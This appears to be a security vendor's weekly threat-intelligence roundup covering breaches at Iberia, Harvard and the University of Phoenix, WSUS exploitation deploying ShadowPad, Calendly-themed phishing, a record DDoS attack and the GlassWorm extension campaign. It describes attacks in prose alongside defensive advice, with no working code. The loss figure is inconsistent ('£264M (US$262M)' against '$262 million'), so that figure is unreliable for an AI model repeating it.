This week’s cyber landscape was dominated by large-scale data breaches, active exploitation of enterprise systems, sophisticated phishing campaigns, and unprecedented DDoS activity. Threat actors continue to blend zero-day exploitation, social engineering, and supply chain compromise to penetrate critical sectors including aviation, finance, higher education, advertising networks, and developer ecosystems.
For defenders, the message is clear: zero-day patching speed, supply chain visibility, and credential protection remain critical pillars of cyber resilience, while IoT botnets and developer tool impersonation show the growing industrialisation of cybercrime.
Iberia Confirms Data Breach Following Vendor Compromise
Category: Data Breach | Third-Party Risk | Aviation
Spain’s largest airline, Iberia, has confirmed a security incident tied to a third-party vendor breach. Exposed data includes customer names, email addresses, and loyalty card IDs. No payment information or passwords were compromised.
Iberia has implemented extra safeguards and notified authorities, but customers are warned to expect potential phishing attempts, especially loyalty-programme scams.
The incident follows a hacker’s claim to possess 77 GB of leaked Iberia data. Whether this data is linked to the vendor breach remains unconfirmed.
SOC & Threat Detection Note:
Vendor access monitoring, identity-based anomaly detection, and data access governance are essential to identify abnormal interactions originating from third-party systems.
FBI Warns Cybercriminals Stole £264M (US$262M) via Account Takeover Fraud
Category: Financial Fraud | Social Engineering | Identity Abuse
The FBI reports cybercriminals impersonating bank support teams stole more than $262 million this year through large-scale Account Takeover (ATO) attacks.
Attackers use fake calls, SMS messages, phishing emails, and spoofed bank websites to harvest usernames, passwords, and MFA codes. Once access is gained:
- Accounts are hijacked
- Passwords are changed
- Funds are immediately wired to crypto wallets or mule accounts
The FBI urges strict MFA hygiene, unique passwords, and accessing bank sites via bookmarks rather than search results.
Threat Intelligence Impact:
ATO fraud continues to bypass MFA through real-time phishing kits and session-token theft. Organizations should deploy anomaly-based login detection and require phishing-resistant MFA.
Harvard University Discloses Voice-Phishing Data Breach
Category: Data Breach | Social Engineering | Higher Education
Harvard University confirmed it suffered a voice-phishing (vishing) attack, compromising data belonging to students, faculty, staff, and alumni donors. Exposed information includes:
- Phone numbers
- Email and physical addresses
- Donor and fundraising records
- Event activity
- Biographical data
Official notifications were issued on November 22. Harvard is cooperating with law enforcement and external cybersecurity specialists.
Security Takeaway:
Vishing is rapidly increasing as attackers exploit human trust in authoritative callers. Continuous user education and call-verification policies are essential in high-value environments like universities and research institutions.
WSUS Vulnerability Actively Exploited to Deploy ShadowPad (CVE-2025-59287)
Category: Zero-Day Exploit | Nation-State Malware | Supply Chain Infrastructure
A critical deserialization flaw in Microsoft WSUS (CVE-2025-59287) is being actively exploited to deploy ShadowPad, a modular backdoor linked to nation-state actors.
Attack chain observed:
-
Exploitation of exposed WSUS servers
-
PowerCat used for remote shell access
-
ShadowPad downloaded via certutil/curl
-
ShadowPad activated using DLL sideloading
-
Malware loads plugins into memory & achieves persistence
The vulnerability was patched last month, but weaponisation accelerated after PoC exploit release.
Impact:
Compromised WSUS servers enable stealthy distribution of malware across entire enterprise fleets.
SOC Insight:
Monitor for anomalous WSUS behaviour, unauthorized DLL loads, unexpected PowerShell execution, or unusual traffic from patch management servers.
Fake “Calendly” Invites Used to Hijack Google & Meta Ad Manager Accounts
Category: Credential Theft | Phishing | Business Account Compromise
A campaign identified by Push Security uses fake “Calendy” scheduling invites impersonating major brands such as Mastercard, Disney, Unilever, and Uber.
Flow of attack:
-
Victim receives realistic meeting invite
-
Invite link leads to a spoofed scheduling page
-
CAPTCHA screen adds legitimacy
-
Fake login portal steals corporate credentials & session cookies
-
Attackers gain access to Google/Meta Ad Manager accounts
-
Ads are hijacked to run malicious or fraudulent campaigns
SOC Takeaway:
Ad platform credentials are high-value targets due to direct financial access. Session hijack detection and device-verification policies should be enforced.
Aisuru Botnet Launches Record-Breaking 29.7 Tbps DDoS Attack Against Cloudflare
Category: DDoS | IoT Botnet | Global Infrastructure
The Aisuru IoT botnet has delivered a staggering 29.7 Tbps DDoS attack, the largest recorded to date.
This attack overwhelms previous multi-terabit events and highlights Aisuru’s rapid evolution.
Built from compromised IoT devices such as:
- Routers
- CCTV cameras
- DVRs
…the botnet leverages global consumer hardware to generate massive traffic volumes.
Infrastructure Insight:
Large DDoS attacks continue to grow in scale due to insecure IoT ecosystems. Providers must adopt adaptive filtering, anycast distribution, and behavioural DDoS detection.
University of Phoenix Reports Breach Linked to Oracle E-Business Suite Zero-Day
Category: Zero-Day Exploit | Data Breach | Ransomware
The University of Phoenix confirmed a significant breach exploiting a zero-day in Oracle E-Business Suite, compromising:
- Social Security numbers
- Banking information
- Personal data of students, staff & suppliers
The breach is linked to the Clop ransomware group, which has targeted multiple U.S. universities and corporations since August 2025— including Harvard, University of Pennsylvania, Logitech, and The Washington Post.
Security Takeaway:
Higher education remains a prime target due to outdated ERP systems, legacy applications, and large volumes of sensitive data.
GlassWorm Resurfaces With 24 Malicious Developer Extensions
Category: Supply Chain Attack | Developer Ecosystem | C2 Innovation
The GlassWorm supply chain campaign has re-emerged, infiltrating the Microsoft Visual Studio Marketplace and Open VSX with 24 malicious extensions impersonating:
- Flutter
- React
- Tailwind
- Vim
- Vue
GlassWorm characteristics:
- Uses Solana blockchain for command-and-control
- Deploys Rust-based implants on Windows & macOS
- Retrieves JS payloads through encrypted channels
- Can fall back to Google Calendar events for C2
- Inflates extension download counts to appear legitimate
- Harvests credentials for npm, GitHub, and Open VSX
This allows attackers to compromise downstream developer pipelines and spread malware through legitimate CI/CD operations.
Threat Intelligence Note:
Developer ecosystems remain a high-value point of infection due to the trust placed in extension marketplaces and the downstream reach of compromised packages.
Analyst Insight
This week emphasises the widening attack surface across enterprises, individuals, cloud services, and developer ecosystems. Key themes include:
1. Zero-Day Exploitation at Scale
- Oracle E-Business Suite zero-day exploited in University of Phoenix breach
- WSUS (CVE-2025-59287) actively exploited to deploy ShadowPad
2. Social Engineering Intensification
- £264M stolen in ATO fraud
- Harvard voice-phishing breach
- Calendly impersonation campaign targeting high-value ad accounts
3. Supply Chain Attack Escalation
- GlassWorm malware campaign targeting developer platforms
- Iberia vendor-linked breach reinforces third-party exposure risks
4. Infrastructure Attacks Evolving
- Aisuru botnet hits a record-breaking 29.7 Tbps DDoS attack
Defensive Priority:
Organizations must strengthen patch management, impose strict identity-based access controls, secure ad platform credentials, harden IoT-exposed assets, and deploy behavioural analytics across networks and cloud environments.
Ready to strengthen your security posture?
Talk to a Specialist | See a Live Demo
Go Back
